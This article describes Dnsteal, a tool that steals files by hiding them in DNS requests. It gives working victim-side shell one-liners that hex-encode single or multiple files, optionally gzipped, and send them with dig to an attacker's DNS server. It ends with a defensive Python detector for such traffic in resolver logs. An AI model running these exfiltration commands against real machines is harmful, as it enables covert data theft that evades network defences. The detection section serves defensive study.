Data exfiltration, also called data extrusion, data exportation, or data theft, is the unauthorized transfer of data from a computer or other device. It is primarily a security breach in which an individual's or organization's data is illegally copied. Data exfiltration is generally a targeted attack: the attacker's primary intent is to find and copy specific data from the target machine. The transfer may be manual, carried out by someone with physical access to the computer, or automated, carried out by malicious code over a network. There are several methods of data exfiltration, but most of them are blocked by endpoint security systems and firewall/IPS deployments. A new tool has been released that aims primarily to bypass such protections by transferring data through seemingly harmless DNS requests.
According to the author, Dnsteal is a data exfiltration tool for stealthily sending files over DNS requests. Once set up and running, it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
Dnsteal is written in Python and available on GitHub. The author gives an example of how to use the tool in the image below.
To begin with, the following command should be entered on the victim machine:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple files
Dnsteal supports exfiltrating multiple files. Use it as below:
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done
Gzip compression supported
It also supports compressing the file to allow for faster transfer; this is enabled with the "-z" switch:
python dnsteal.py 127.0.0.1 -z
Then, on the victim machine, send a gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
For multiple gzip-compressed files, use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
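The commands above leave a recognisable trace in resolver logs: every query carries a long, purely hexadecimal leftmost label (the output of xxd -p) under one domain, and the chunks decode to the file's own bytes, so a gzipped transfer starts with the gzip magic 1f8b. The following Python detector, added here as an example and not part of the original post or of dnsteal, runs those checks over a constructed list of query names, flags domains receiving repeated hex-labelled queries, and reassembles the flagged chunks to identify the file type by its magic bytes; the sample queries, the 16-character threshold and the two-label domain approximation are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed sample of DNS query names, e.g. pulled from a resolver log; not a real capture.
# The hex labels mimic `xxd -p` output: the leading bytes of a PNG and of a gzip stream.
SAMPLE_QUERIES = [
    "www.example.com",
    "89504e470d0a1a0a0000000d49484452.filename.com",
    "mail.example.com",
    "0000020000000200080600000040e6a6.filename.com",
    "cdn.static.example.org",
    "1f8b0800000000000003ed.other-host.net",
]

# A label made only of hex byte pairs and at least 16 chars long is rare in legitimate
# hostnames but is exactly what a hex-encoded file chunk looks like (threshold is an assumption).
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){8,}$")

# Magic bytes that identify a reassembled stream (gzip covers dnsteal's -z mode).
MAGIC = {b"\x89PNG": "png", b"\x1f\x8b": "gzip", b"PK\x03\x04": "zip"}

def split_name(qname):
    """Return (leftmost label, approximate registered domain = last two labels)."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[0], ".".join(labels[-2:])

def is_hex_chunk(qname):
    """True when the leftmost label looks like a hex-encoded data chunk."""
    return bool(HEX_LABEL.match(split_name(qname)[0]))

def detect_exfil(queries, min_hits=2):
    """Group hex-labelled queries by domain; report domains with >= min_hits of them."""
    hits = defaultdict(list)
    for q in queries:
        if is_hex_chunk(q):
            hits[split_name(q)[1]].append(q)
    return {d: qs for d, qs in hits.items() if len(qs) >= min_hits}

def recover_prefix(queries):
    """Reassemble flagged chunks in arrival order and name the file type by its magic."""
    data = b"".join(bytes.fromhex(split_name(q)[0]) for q in queries)
    kind = next((n for m, n in MAGIC.items() if data.startswith(m)), "unknown")
    return data, kind

if __name__ == "__main__":
    for domain, qs in detect_exfil(SAMPLE_QUERIES).items():
        data, kind = recover_prefix(qs)
        print(f"{domain}: {len(qs)} chunks, {len(data)} bytes reassembled, type {kind}")
```

Lowering min_hits to 1 also surfaces the single gzip chunk for other-host.net, which shows the trade-off between catching a short transfer and tolerating one-off odd hostnames.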
For more details, head over to the GitHub page: https://github.com/m57/dnsteal